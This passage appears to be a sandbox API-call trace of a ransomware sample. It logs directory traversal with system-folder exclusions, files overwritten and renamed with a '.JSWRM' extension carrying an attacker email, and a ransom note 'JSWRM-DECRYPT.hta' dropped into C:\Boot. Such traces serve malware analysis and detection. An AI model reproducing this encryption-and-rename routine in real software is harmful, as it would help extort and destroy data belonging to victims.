lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0063.273] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.273] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=5091790) returned 1 [0063.273] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.273] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0063.285] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.285] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0063.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.286] CloseHandle (hObject=0x450) returned 1 [0063.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0063.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0063.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0063.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0063.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0063.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0063.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x218b68 [0063.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0063.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.479] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0063.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x218b68 | out: hHeap=0x1e0000) returned 1 [0063.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0063.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0063.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.483] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0063.483] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2=".") returned 1 [0063.483] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="..") returned 1 [0063.484] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="...") returned 1 [0063.484] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="windows") returned 1 [0063.484] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="recovery") returned 1 [0063.484] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="perflogs") returned 1 [0063.484] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="documents and settings") returned 1 [0063.484] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="$RECYCLE.BIN") returned 1 [0063.484] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="system volume information") returned 1 [0063.484] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x86.msu", lpString2="msocache") returned 1 [0063.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0063.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB958488-v6001-x86.msu", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB958488-v6001-x86.msu", cchWideChar=33, lpMultiByteStr=0x1f84e8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB958488-v6001-x86.msu", lpUsedDefaultChar=0x0) returned 33 [0063.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0063.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0063.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB958488-v6001-x86.msu", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB958488-v6001-x86.msu", cchWideChar=33, lpMultiByteStr=0x1f87c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB958488-v6001-x86.msu", lpUsedDefaultChar=0x0) returned 33 [0063.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0063.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0063.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0063.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0063.484] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.484] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=2141433) returned 1 [0063.484] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.485] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0063.497] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.497] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0063.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.498] CloseHandle (hObject=0x450) returned 1 [0063.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0063.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0063.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0063.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0063.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0063.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0063.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x218b68 [0063.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0063.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.584] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0063.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x218b68 | out: hHeap=0x1e0000) returned 1 [0063.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0063.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0063.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.585] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0063.585] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0063.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0063.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0063.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0063.585] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2=".") returned 1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2="..") returned 1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2="...") returned 1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2="windows") returned -1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2="recovery") returned -1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2="perflogs") returned -1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2="documents and settings") returned -1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2="$RECYCLE.BIN") returned 1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2="system volume information") returned -1 [0063.585] lstrcmpiW (lpString1="Boot", lpString2="msocache") returned -1 [0063.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0063.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0063.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.586] GetFileAttributesW (lpFileName="C:\\Boot\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\jswrm-decrypt.hta")) returned 0xffffffff [0063.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c894, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0063.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0063.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0063.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0063.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0063.587] CreateFileW (lpFileName="C:\\Boot\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0063.587] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.587] WriteFile (in: hFile=0x44c, lpBuffer=0x345c9a8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c974, lpOverlapped=0x0 | out: lpBuffer=0x345c9a8*, lpNumberOfBytesWritten=0x345c974*=0x230c, lpOverlapped=0x0) returned 1 [0063.589] CloseHandle (hObject=0x44c) returned 1 [0063.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0063.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0063.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0063.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0063.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0063.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0063.589] GetFileAttributesW (lpFileName="C:\\Boot\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\jswrm-decrypt.hta")) returned 0x20 [0063.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0063.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.590] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1c90820a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0063.590] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.590] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1c90820a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="..", cAlternateFileName="")) returned 1 [0063.632] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.632] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.632] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xac3efa99, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xac3efa99, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="BCD", cAlternateFileName="")) returned 1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2=".") returned 1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2="..") returned 1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2="...") returned 1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2="windows") returned -1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2="recovery") returned -1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2="perflogs") returned -1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2="documents and settings") returned -1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2="$RECYCLE.BIN") returned 1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2="system volume information") returned -1 [0063.632] lstrcmpiW (lpString1="BCD", lpString2="msocache") returned -1 [0063.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0063.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD", cchWideChar=3, lpMultiByteStr=0x345f978, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD", lpUsedDefaultChar=0x0) returned 3 [0063.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0063.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCD", cchWideChar=3, lpMultiByteStr=0x345f948, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD", lpUsedDefaultChar=0x0) returned 3 [0063.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.633] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.634] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=10153508848537816) returned 0 [0063.634] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.634] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f63c*=0x0, 